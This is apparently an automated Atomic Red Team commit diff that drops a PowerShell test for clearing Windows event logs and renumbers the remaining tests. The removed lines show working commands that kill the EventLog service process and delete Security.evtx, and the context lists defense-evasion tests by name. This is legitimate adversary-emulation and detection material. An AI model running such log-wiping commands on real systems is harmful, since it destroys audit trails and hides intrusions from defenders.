Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
CircleCI Atomic Red Team doc generator
parent
1e373f8f6d
commit
e8340a678f
@@ -222,8 +222,7 @@ defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-
|
||||
defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
|
||||
defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using PowerShell,334c36ca-fec3-47ff-afdb-22b2ae6d0812,powershell
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,3,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
|
||||
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
|
||||
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
|
||||
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
|
||||
|
||||
|
@@ -65,8 +65,7 @@ defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt De
|
||||
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
|
||||
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using PowerShell,334c36ca-fec3-47ff-afdb-22b2ae6d0812,powershell
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,3,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
|
||||
defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
|
||||
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
|
||||
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
|
||||
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
|
||||
|
||||
|
@@ -467,8 +467,7 @@
|
||||
- Atomic Test #3: Overwrite Linux Log [linux]
|
||||
- [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
|
||||
- Atomic Test #1: Clear Logs [windows]
|
||||
- Atomic Test #2: Delete System Logs Using PowerShell [windows]
|
||||
- Atomic Test #3: Delete System Logs Using Clear-EventLogId [windows]
|
||||
- Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
|
||||
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
|
||||
|
||||
@@ -139,8 +139,7 @@
|
||||
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
|
||||
- [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
|
||||
- Atomic Test #1: Clear Logs [windows]
|
||||
- Atomic Test #2: Delete System Logs Using PowerShell [windows]
|
||||
- Atomic Test #3: Delete System Logs Using Clear-EventLogId [windows]
|
||||
- Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
|
||||
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
|
||||
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
|
||||
|
||||
@@ -21240,24 +21240,6 @@ defense-evasion:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Delete System Logs Using PowerShell
|
||||
auto_generated_guid: 334c36ca-fec3-47ff-afdb-22b2ae6d0812
|
||||
description: |
|
||||
Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
|
||||
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
|
||||
When this service gets stopped, it is automatically restarted and the Security.evtx file re-created.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
|
||||
Stop-Process -Id $eventLogId -Force
|
||||
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
|
||||
cleanup_command: 'Start-Service -Name EventLog
|
||||
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Delete System Logs Using Clear-EventLogId
|
||||
auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498
|
||||
description: |
|
||||
|
||||
@@ -14,9 +14,7 @@ These logs may also be cleared through other mechanisms, such as the event viewe
|
||||
|
||||
- [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
|
||||
|
||||
- [Atomic Test #2 - Delete System Logs Using PowerShell](#atomic-test-2---delete-system-logs-using-powershell)
|
||||
|
||||
- [Atomic Test #3 - Delete System Logs Using Clear-EventLogId](#atomic-test-3---delete-system-logs-using-clear-eventlogid)
|
||||
- [Atomic Test #2 - Delete System Logs Using Clear-EventLogId](#atomic-test-2---delete-system-logs-using-clear-eventlogid)
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -50,39 +48,7 @@ wevtutil cl #{log_name}
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Delete System Logs Using PowerShell
|
||||
Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
|
||||
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
|
||||
When this service gets stopped, it is automatically restarted and the Security.evtx file re-created.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
|
||||
Stop-Process -Id $eventLogId -Force
|
||||
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Start-Service -Name EventLog
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Delete System Logs Using Clear-EventLogId
|
||||
## Atomic Test #2 - Delete System Logs Using Clear-EventLogId
|
||||
Clear event logs using built-in PowerShell commands.
|
||||
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user